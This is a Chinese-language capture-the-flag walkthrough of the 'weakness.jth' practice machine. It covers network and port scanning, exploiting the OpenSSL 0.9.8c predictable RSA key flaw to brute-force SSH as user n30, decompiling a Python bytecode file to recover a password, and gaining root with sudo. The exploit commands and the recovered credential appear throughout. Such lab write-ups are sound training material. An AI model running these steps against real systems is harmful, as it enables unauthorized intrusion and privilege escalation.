一、信息收集
1、主机发现
nmap 192.168.236.0/24
2、端口扫描
开放22/80/443端口
nmap 192.168.236.164 -p- -A
3、目录扫描
dirsearch -u http://192.168.236.164
二、漏洞探测
在端口扫描时发现一个域名,可能需要绑定域名
修改hosts文件,绑定域名weakness.jth,然后访问该域名,发现 -n30,和upload.php页面的title一样
kali绑定该域名,再次进行目录扫描,发现新东西
在notes.txt中有提示,给出openssl的版本,mykey有一个公钥
在kali上搜索相关漏洞
searchsploit openssl 0.9.8c-1
查看漏洞利用文本内容
三、GetShell
下载上传kali解压,生成一个rsa文件夹
tar -jxvf 5622.tar.bz2
远程下载mykey.pub文件到kali上
wget http://weakness.jth/private/files/mykey.pub
再将5720.py文件下载下来进行爆破
python2 5720.py ./rsa/2048 192.168.236.164 n30 22
其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh
在生成的rsa的2048目录下进行ssh连接
四、提权
在当前目录下有一个code文件
文件类型为python 2.7 byte-compiled
攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译
编译完发现了n30的密码 n30:dMASDNB!!#B!#!#33
靶机:python -m SimpleHTTPServer 9999
攻击机:wget http://192.168.236.164:9999/code
mv code code.pyc
uncompyle6 -o code.py code.pyc(此条命令需要进入到uncomply目录中执行,或者将其设为环境变量export PATH=$PATH:/home/kali/.local/bin)
sudo su,输入密码后可成功提权